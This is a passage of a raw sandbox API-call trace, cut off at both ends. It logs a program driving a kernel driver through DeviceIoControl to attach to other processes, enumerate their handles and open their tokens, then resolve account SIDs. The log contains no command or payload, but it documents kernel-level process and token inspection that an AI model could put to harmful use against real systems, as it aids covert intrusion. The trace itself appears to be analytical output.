hHeap=0x320000) returned 1 [0226.165] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.165] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x9e, lpOverlapped=0x0) returned 1 [0226.165] PsLookupProcessByProcessId (in: ProcessId=0x7dc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.165] PsAcquireProcessExitSynchronization () returned 0x0 [0226.165] KeStackAttachProcess (in: PROCESS=0xfffffa8001f60b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f60b30, ApcState=0xfffff880052b35d0) [0226.165] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f62840, HandleInformation=0x0) returned 0x0 [0226.165] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.165] PsReleaseProcessExitSynchronization () returned 0x2 [0226.165] ObfDereferenceObject (Object=0xfffffa8001f60b30) returned 0x12 [0226.165] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.165] ObfDereferenceObject (Object=0xfffffa8001f62840) returned 0x1 [0226.165] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.166] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.166] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.166] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.166] PsLookupProcessByProcessId (in: ProcessId=0x7dc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.166] PsAcquireProcessExitSynchronization () returned 0x0 [0226.166] KeStackAttachProcess (in: PROCESS=0xfffffa8001f60b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f60b30, ApcState=0xfffff880052b35d0) [0226.166] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.166] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.166] PsReleaseProcessExitSynchronization () returned 0x2 [0226.166] ObfDereferenceObject (Object=0xfffffa8001f60b30) returned 0x12 [0226.166] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.166] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x54 [0226.166] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.166] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3b4) returned 0xc8 [0226.166] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.166] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8001edd630, HandleInformation=0x0) returned 0x0 [0226.167] ObOpenObjectByPointer (in: Object=0xfffffa8001edd630, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800005bc) returned 0x0 [0226.167] ObfDereferenceObject (Object=0xfffffa8001edd630) returned 0x14 [0226.167] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800005bc, DesiredAccess=0x8, TokenHandle=0xfffffa8001f3f400 | out: TokenHandle=0xfffffa8001f3f400*=0xc4) returned 0x0 [0226.167] ZwClose (Handle=0xffffffff800005bc) returned 0x0 [0226.167] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.167] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.167] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.169] CloseHandle (hObject=0xc4) returned 1 [0226.169] CloseHandle (hObject=0xc8) returned 1 [0226.169] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.169] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.169] PsLookupProcessByProcessId (in: ProcessId=0x3b4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.169] PsAcquireProcessExitSynchronization () returned 0x0 [0226.169] KeStackAttachProcess (in: PROCESS=0xfffffa8001edd630, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001edd630, ApcState=0xfffff880052b35d0) [0226.170] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003792f20, HandleInformation=0x0) returned 0x0 [0226.170] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.170] PsReleaseProcessExitSynchronization () returned 0x2 [0226.170] ObfDereferenceObject (Object=0xfffffa8001edd630) returned 0x12 [0226.170] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.170] ObfDereferenceObject (Object=0xfffffa8003792f20) returned 0x1 [0226.170] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.170] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.170] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.170] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x94, lpOverlapped=0x0) returned 1 [0226.170] PsLookupProcessByProcessId (in: ProcessId=0x3b4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.170] PsAcquireProcessExitSynchronization () returned 0x0 [0226.170] KeStackAttachProcess (in: PROCESS=0xfffffa8001edd630, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001edd630, ApcState=0xfffff880052b35d0) [0226.170] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001e96dd0, HandleInformation=0x0) returned 0x0 [0226.170] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.170] PsReleaseProcessExitSynchronization () returned 0x2 [0226.170] ObfDereferenceObject (Object=0xfffffa8001edd630) returned 0x12 [0226.170] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.170] ObfDereferenceObject (Object=0xfffffa8001e96dd0) returned 0x1 [0226.170] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.171] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.171] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.171] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.171] PsLookupProcessByProcessId (in: ProcessId=0x3b4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.171] PsAcquireProcessExitSynchronization () returned 0x0 [0226.171] KeStackAttachProcess (in: PROCESS=0xfffffa8001edd630, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001edd630, ApcState=0xfffff880052b35d0) [0226.171] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.171] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.171] PsReleaseProcessExitSynchronization () returned 0x2 [0226.171] ObfDereferenceObject (Object=0xfffffa8001edd630) returned 0x12 [0226.171] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.171] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x54 [0226.171] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.171] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x704) returned 0xc8 [0226.171] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.171] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8001ee8b30, HandleInformation=0x0) returned 0x0 [0226.171] ObOpenObjectByPointer (in: Object=0xfffffa8001ee8b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800005bc) returned 0x0 [0226.172] ObfDereferenceObject (Object=0xfffffa8001ee8b30) returned 0x14 [0226.172] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800005bc, DesiredAccess=0x8, TokenHandle=0xfffffa8001f3f400 | out: TokenHandle=0xfffffa8001f3f400*=0xc4) returned 0x0 [0226.172] ZwClose (Handle=0xffffffff800005bc) returned 0x0 [0226.172] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.172] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.172] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.174] CloseHandle (hObject=0xc4) returned 1 [0226.174] CloseHandle (hObject=0xc8) returned 1 [0226.174] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.174] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.174] PsLookupProcessByProcessId (in: ProcessId=0x704, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.174] PsAcquireProcessExitSynchronization () returned 0x0 [0226.174] KeStackAttachProcess (in: PROCESS=0xfffffa8001ee8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001ee8b30, ApcState=0xfffff880052b35d0) [0226.174] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ee82d0, HandleInformation=0x0) returned 0x0 [0226.174] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.174] PsReleaseProcessExitSynchronization () returned 0x2 [0226.174] ObfDereferenceObject (Object=0xfffffa8001ee8b30) returned 0x12 [0226.174] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.174] ObfDereferenceObject (Object=0xfffffa8001ee82d0) returned 0x1 [0226.174] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.175] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.175] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.175] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x64, lpOverlapped=0x0) returned 1 [0226.175] PsLookupProcessByProcessId (in: ProcessId=0x704, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.175] PsAcquireProcessExitSynchronization () returned 0x0 [0226.175] KeStackAttachProcess (in: PROCESS=0xfffffa8001ee8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001ee8b30, ApcState=0xfffff880052b35d0) [0226.175] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ede150, HandleInformation=0x0) returned 0x0 [0226.175] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.175] PsReleaseProcessExitSynchronization () returned 0x2 [0226.175] ObfDereferenceObject (Object=0xfffffa8001ee8b30) returned 0x12 [0226.175] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.175] ObfDereferenceObject (Object=0xfffffa8001ede150) returned 0x1 [0226.175] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.175] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.175] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.175] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.175] PsLookupProcessByProcessId (in: ProcessId=0x704, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.175] PsAcquireProcessExitSynchronization () returned 0x0 [0226.175] KeStackAttachProcess (in: PROCESS=0xfffffa8001ee8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001ee8b30, ApcState=0xfffff880052b35d0) [0226.175] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.176] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.176] PsReleaseProcessExitSynchronization () returned 0x2 [0226.176] ObfDereferenceObject (Object=0xfffffa8001ee8b30) returned 0x12 [0226.176] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.176] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x54 [0226.176] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.176] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.176] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x694) returned 0xc8 [0226.176] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.176] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8001f45b30, HandleInformation=0x0) returned 0x0 [0226.176] ObOpenObjectByPointer (in: Object=0xfffffa8001f45b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800005bc) returned 0x0 [0226.176] ObfDereferenceObject (Object=0xfffffa8001f45b30) returned 0x14 [0226.176] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800005bc, DesiredAccess=0x8, TokenHandle=0xfffffa8001f3f400 | out: TokenHandle=0xfffffa8001f3f400*=0xc4) returned 0x0 [0226.176] ZwClose (Handle=0xffffffff800005bc) returned 0x0 [0226.176] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.176] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0226.177] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0226.178] CloseHandle (hObject=0xc4) returned 1 [0226.178] CloseHandle (hObject=0xc8) returned 1 [0226.179] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.179] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0226.179] PsLookupProcessByProcessId (in: ProcessId=0x694, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.179] PsAcquireProcessExitSynchronization () returned 0x0 [0226.179] KeStackAttachProcess (in: PROCESS=0xfffffa8001f45b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f45b30, ApcState=0xfffff880052b35d0) [0226.179] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f42dd0, HandleInformation=0x0) returned 0x0 [0226.179] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.179] PsReleaseProcessExitSynchronization () returned 0x2 [0226.179] ObfDereferenceObject (Object=0xfffffa8001f45b30) returned 0x12 [0226.179] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.179] ObfDereferenceObject (Object=0xfffffa8001f42dd0) returned 0x1 [0226.179] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.179] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.179] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.179] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x68, lpOverlapped=0x0) returned 1 [0226.179] PsLookupProcessByProcessId (in: ProcessId=0x694, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.179] PsAcquireProcessExitSynchronization () returned 0x0 [0226.179] KeStackAttachProcess (in: PROCESS=0xfffffa8001f45b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f45b30, ApcState=0xfffff880052b35d0) [0226.180] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80019de810, HandleInformation=0x0) returned 0x0 [0226.180] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.180] PsReleaseProcessExitSynchronization () returned 0x2 [0226.180] ObfDereferenceObject (Object=0xfffffa8001f45b30) returned 0x12 [0226.180] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880052b3508) returned 0x0 [0226.180] ObfDereferenceObject (Object=0xfffffa80019de810) returned 0x1 [0226.180] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.180] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.180] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0226.180] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0226.180] PsLookupProcessByProcessId (in: ProcessId=0x694, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0226.180] PsAcquireProcessExitSynchronization () returned 0x0 [0226.180] KeStackAttachProcess (in: PROCESS=0xfffffa8001f45b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001f45b30, ApcState=0xfffff880052b35d0) [0226.180] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0226.180] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0226.180] PsReleaseProcessExitSynchronization () returned 0x2 [0226.180] ObfDereferenceObject (Object=0xfffffa8001f45b30) returned 0x12 [0226.180] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003069044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003069044, ReturnLength=0xfffff880052b3550) returned 0x0 [0226.180] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x54 [0226.180] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0226.180] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0226.181] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x734) returned 0xc8 [0226.181] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0226.181] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa8001f99b30, HandleInformation=0x0) returned 0x0 [0226.181] ObOpenObjectByPointer (in: Object=0xfffffa8001f99b30, HandleAttributes=0x200, PassedAccessState=0x0, 